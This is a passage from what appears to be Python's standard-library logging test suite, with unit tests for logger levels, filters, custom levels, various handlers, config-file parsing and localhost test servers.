ERR.setLevel(logging.ERROR)
INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warning(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warning(m())
DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warning(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warning(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
#Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warning(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warning(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
def test_regression_22386(self):
"""See issue #22386 for more information."""
self.assertEqual(logging.getLevelName('INFO'), logging.INFO)
self.assertEqual(logging.getLevelName(logging.INFO), 'INFO')
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
def test_callable_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
def filterfunc(record):
parts = record.name.split('.')
prefix = '.'.join(parts[:2])
return prefix == 'spam.eggs'
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filterfunc)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filterfunc)
def test_empty_filter(self):
f = logging.Filter()
r = logging.makeLogRecord({'name': 'spam.eggs'})
self.assertTrue(f.filter(r))
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class HandlerTest(BaseTest):
def test_name(self):
h = logging.Handler()
h.name = 'generic'
self.assertEqual(h.name, 'generic')
h.name = 'anothergeneric'
self.assertEqual(h.name, 'anothergeneric')
self.assertRaises(NotImplementedError, h.emit, None)
def test_builtin_handlers(self):
# We can't actually *use* too many handlers in the tests,
# but we can try instantiating them with various options
if sys.platform in ('linux', 'darwin'):
for existing in (True, False):
fd, fn = tempfile.mkstemp()
os.close(fd)
if not existing:
os.unlink(fn)
h = logging.handlers.WatchedFileHandler(fn, delay=True)
if existing:
dev, ino = h.dev, h.ino
self.assertEqual(dev, -1)
self.assertEqual(ino, -1)
r = logging.makeLogRecord({'msg': 'Test'})
h.handle(r)
# Now remove the file.
os.unlink(fn)
self.assertFalse(os.path.exists(fn))
# The next call should recreate the file.
h.handle(r)
self.assertTrue(os.path.exists(fn))
else:
self.assertEqual(h.dev, -1)
self.assertEqual(h.ino, -1)
h.close()
if existing:
os.unlink(fn)
if sys.platform == 'darwin':
sockname = '/var/run/syslog'
else:
sockname = '/dev/log'
try:
h = logging.handlers.SysLogHandler(sockname)
self.assertEqual(h.facility, h.LOG_USER)
self.assertTrue(h.unixsocket)
h.close()
except OSError: # syslogd might not be available
pass
for method in ('GET', 'POST', 'PUT'):
if method == 'PUT':
self.assertRaises(ValueError, logging.handlers.HTTPHandler,
'localhost', '/log', method)
else:
h = logging.handlers.HTTPHandler('localhost', '/log', method)
h.close()
h = logging.handlers.BufferingHandler(0)
r = logging.makeLogRecord({})
self.assertTrue(h.shouldFlush(r))
h.close()
h = logging.handlers.BufferingHandler(1)
self.assertFalse(h.shouldFlush(r))
h.close()
@unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_race(self):
# Issue #14632 refers.
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
self.deletion_time = time.time()
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
self.handle_time = None
self.deletion_time = None
for delay in (False, True):
fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
os.close(fd)
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
try:
self.handle_time = time.time()
h.handle(r)
except Exception:
print('Deleted at %s, '
'opened at %s' % (self.deletion_time,
self.handle_time))
raise
finally:
remover.join()
h.close()
if os.path.exists(fn):
os.unlink(fn)
class BadStream(object):
def write(self, data):
raise RuntimeError('deliberate mistake')
class TestStreamHandler(logging.StreamHandler):
def handleError(self, record):
self.error_record = record
class StreamHandlerTest(BaseTest):
def test_error_handling(self):
h = TestStreamHandler(BadStream())
r = logging.makeLogRecord({})
old_raise = logging.raiseExceptions
try:
h.handle(r)
self.assertIs(h.error_record, r)
h = logging.StreamHandler(BadStream())
with support.captured_stderr() as stderr:
h.handle(r)
msg = '\nRuntimeError: deliberate mistake\n'
self.assertIn(msg, stderr.getvalue())
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
h.handle(r)
self.assertEqual('', stderr.getvalue())
finally:
logging.raiseExceptions = old_raise
# -- The following section could be moved into a server_helper.py module
# -- if it proves to be of wider utility than just test_logging
if threading:
class TestSMTPServer(smtpd.SMTPServer):
"""
This class implements a test SMTP server.
:param addr: A (host, port) tuple which the server listens on.
You can specify a port value of zero: the server's
*port* attribute will hold the actual port number
used, which can be used in client connections.
:param handler: A callable which will be called to process
incoming messages. The handler will be passed
the client address tuple, who the message is from,
a list of recipients and the message data.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
:param sockmap: A dictionary which will be used to hold
:class:`asyncore.dispatcher` instances used by
:func:`asyncore.loop`. This avoids changing the
:mod:`asyncore` module's global state.
"""
def __init__(self, addr, handler, poll_interval, sockmap):
smtpd.SMTPServer.__init__(self, addr, None, map=sockmap,
decode_data=True)
self.port = self.socket.getsockname()[1]
self._handler = handler
self._thread = None
self.poll_interval = poll_interval
def process_message(self, peer, mailfrom, rcpttos, data):
"""
Delegates to the handler passed in to the server's constructor.
Typically, this will be a test case method.
:param peer: The client (host, port) tuple.
:param mailfrom: The address of the sender.
:param rcpttos: The addresses of the recipients.
:param data: The message.
"""
self._handler(peer, mailfrom, rcpttos, data)
def start(self):
"""
Start the server running on a separate daemon thread.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the :mod:`asyncore` loop until normal termination
conditions arise.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
"""
try:
asyncore.loop(poll_interval, map=self._map)
except OSError:
# On FreeBSD 8, closing the server repeatably
# raises this error. We swallow it if the
# server has been closed.
if self.connected or self.accepting:
raise
def stop(self, timeout=None):
"""
Stop the thread by closing the server instance.
Wait for the server thread to terminate.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.close()
self._thread.join(timeout)
self._thread = None
class ControlMixin(object):
"""
This mixin is used to start a server on a separate thread, and
shut it down programmatically. Request handling is simplified - instead
of needing to derive a suitable RequestHandler subclass, you just
provide a callable which will be passed each received request to be
processed.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request. This handler is called on the
server thread, effectively meaning that requests are
processed serially. While not quite Web scale ;-),
this should be fine for testing applications.
:param poll_interval: The polling interval in seconds.
"""
def __init__(self, handler, poll_interval):
self._thread = None
self.poll_interval = poll_interval
self._handler = handler
self.ready = threading.Event()
def start(self):
"""
Create a daemon thread to run the server, and start it.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the server. Set the ready flag before entering the
service loop.
"""
self.ready.set()
super(ControlMixin, self).serve_forever(poll_interval)
def stop(self, timeout=None):
"""
Tell the server thread to stop, and wait for it to do so.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.shutdown()
if self._thread is not None:
self._thread.join(timeout)
self._thread = None
self.server_close()
self.ready.clear()
class TestHTTPServer(ControlMixin, HTTPServer):
"""
An HTTP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval in seconds.
:param log: Pass ``True`` to enable log messages.
"""
def __init__(self, addr, handler, poll_interval=0.5,
log=False, sslctx=None):
class DelegatingHTTPRequestHandler(BaseHTTPRequestHandler):
def __getattr__(self, name, default=None):
if name.startswith('do_'):
return self.process_request
raise AttributeError(name)
def process_request(self):
self.server._handler(self)
def log_message(self, format, *args):
if log:
super(DelegatingHTTPRequestHandler,
self).log_message(format, *args)
HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler)
ControlMixin.__init__(self, handler, poll_interval)
self.sslctx = sslctx
def get_request(self):
try:
sock, addr = self.socket.accept()
if self.sslctx:
sock = self.sslctx.wrap_socket(sock, server_side=True)
except OSError as e:
# socket errors are silenced by the caller, print them here
sys.stderr.write("Got an error:\n%s\n" % e)
raise
return sock, addr
class TestTCPServer(ControlMixin, ThreadingTCPServer):
"""
A TCP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a single
parameter - the request - in order to process the request.
:param poll_interval: The polling interval in seconds.
:bind_and_activate: If True (the default), binds the server and starts it
listening. If False, you need to call
:meth:`server_bind` and :meth:`server_activate` at
some later time before calling :meth:`start`, so that
the server will set up the socket and listen on it.
"""
allow_reuse_address = True
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingTCPRequestHandler(StreamRequestHandler):
def handle(self):
self.server._handler(self)
ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
def server_bind(self):
super(TestTCPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
class TestUDPServer(ControlMixin, ThreadingUDPServer):
"""
A UDP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval for shutdown requests,
in seconds.
:bind_and_activate: If True (the default), binds the server and
starts it listening. If False, you need to
call :meth:`server_bind` and
:meth:`server_activate` at some later time
before calling :meth:`start`, so that the server will
set up the socket and listen on it.
"""
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingUDPRequestHandler(DatagramRequestHandler):
def handle(self):
self.server._handler(self)
def finish(self):
data = self.wfile.getvalue()
if data:
try:
super(DelegatingUDPRequestHandler, self).finish()
except OSError:
if not self.server._closed:
raise
ThreadingUDPServer.__init__(self, addr,
DelegatingUDPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
self._closed = False
def server_bind(self):
super(TestUDPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
def server_close(self):
super(TestUDPServer, self).server_close()
self._closed = True
if hasattr(socket, "AF_UNIX"):
class TestUnixStreamServer(TestTCPServer):
address_family = socket.AF_UNIX
class TestUnixDatagramServer(TestUDPServer):
address_family = socket.AF_UNIX
# - end of server_helper section
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPHandlerTest(BaseTest):
TIMEOUT = 8.0
def test_basic(self):
sockmap = {}
server = TestSMTPServer((support.HOST, 0), self.process_message, 0.001,
sockmap)
server.start()
addr = (support.HOST, server.port)
h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log',
timeout=self.TIMEOUT)
self.assertEqual(h.toaddrs, ['you'])
self.messages = []
r = logging.makeLogRecord({'msg': 'Hello'})
self.handled = threading.Event()
h.handle(r)
self.handled.wait(self.TIMEOUT) # 14314: don't wait forever
server.stop()
self.assertTrue(self.handled.is_set())
self.assertEqual(len(self.messages), 1)
peer, mailfrom, rcpttos, data = self.messages[0]
self.assertEqual(mailfrom, 'me')
self.assertEqual(rcpttos, ['you'])
self.assertIn('\nSubject: Log\n', data)
self.assertTrue(data.endswith('\n\nHello'))
h.close()
def process_message(self, *args):
self.messages.append(args)
self.handled.set()
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warning(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
disable_test = """
[loggers]
keys=root
[handlers]
keys=screen
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=screen
[handler_screen]
level=DEBUG
class=StreamHandler
args=(sys.stdout,)
formatter=
"""
def apply_config(self, conf, **kwargs):
file = io.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file, **kwargs)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config0_using_cp_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
file = io.StringIO(textwrap.dedent(self.config0))
cp = configparser.ConfigParser()
cp.read_file(file)
logging.config.fileConfig(cp)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_logger_disabling(self):
self.apply_config(self.disable_test)
logger = logging.getLogger('some_pristine_logger')
self.assertFalse(logger.disabled)
self.apply_config(self.disable_test)
self.assertTrue(logger.disabled)
self.apply_config(self.disable_test, disable_existing_loggers=False)
self.assertFalse(logger.disabled)
@unittest.skipUnless(threading, 'Threading required for this test.')
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
if threading:
server_class = TestTCPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.server = server = self.server_class(self.address,
self.handle_socket, 0.01)
server.start()
server.ready.wait()
hcls = logging.handlers.SocketHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Semaphore(0)
def tearDown(self):
"""Shutdown the TCP server."""
try:
self.server.stop(2.0)
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_socket(self, request):
conn = request.connection
while True:
chunk = conn.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = conn.recv(slen)
while len(chunk) < slen:
chunk = chunk + conn.recv(slen - len(chunk))
obj = pickle.loads(chunk)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.release()
def test_output(self):
# The log message sent to the SocketHandler is properly received.
logger = logging.getLogger("tcp")
logger.error("spam")
self.handled.acquire()
logger.debug("eggs")
self.handled.acquire()
self.assertEqual(self.log_output, "spam\neggs\n")
def test_noserver(self):
# Avoid timing-related failures due to SocketHandler's own hard-wired
# one-second timeout on socket.create_connection() (issue #16264).
self.sock_hdlr.retryStart = 2.5
# Kill the server
self.server.stop(2.0)
# The logging call should try to connect, which should fail
try:
raise RuntimeError('Deliberate mistake')
except RuntimeError:
self.root_logger.exception('Never sent')
self.root_logger.error('Never sent, either')
now = time.time()
self.assertGreater(self.sock_hdlr.retryTime, now)
time.sleep(self.sock_hdlr.retryTime - now + 0.001)
self.root_logger.error('Nor this')
def _get_temp_domain_socket():
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.sock')
os.close(fd)
# just need a name - file can't be present, or we'll get an
# 'address already in use' error.
os.remove(fn)
return fn
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
@unittest.skipUnless(threading, 'Threading required for this test.')
class UnixSocketHandlerTest(SocketHandlerTest):
"""Test for SocketHandler with unix sockets."""
if threading and hasattr(socket, "AF_UNIX"):
server_class = TestUnixStreamServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SocketHandlerTest.setUp(self)
def tearDown(self):
SocketHandlerTest.tearDown(self)
os.remove(self.address)
@unittest.skipUnless(threading, 'Threading required for this test.')
class DatagramHandlerTest(BaseTest):
"""Test for DatagramHandler."""
if threading:
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a DatagramHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
server.ready.wait()
hcls = logging.handlers.DatagramHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
